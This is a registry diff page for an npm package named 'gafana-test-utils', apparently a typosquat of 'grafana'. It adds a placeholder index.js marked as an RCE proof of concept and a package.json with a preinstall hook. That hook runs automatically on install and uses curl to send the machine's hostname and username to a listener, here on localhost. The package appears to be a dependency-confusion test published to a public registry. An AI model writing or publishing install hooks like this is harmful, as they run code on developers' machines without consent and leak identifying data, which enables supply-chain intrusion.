gafana-test-utils 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -0
- package/package.json +11 -0
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
// RCE PoC file
|
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "gafana-test-utils",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "Fake scoped package for local RCE test",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "curl http://localhost:8000/$(hostname)_$(whoami)"
|
|
8
|
+
},
|
|
9
|
+
"author": "himanshu",
|
|
10
|
+
"license": "MIT"
|
|
11
|
+
}
|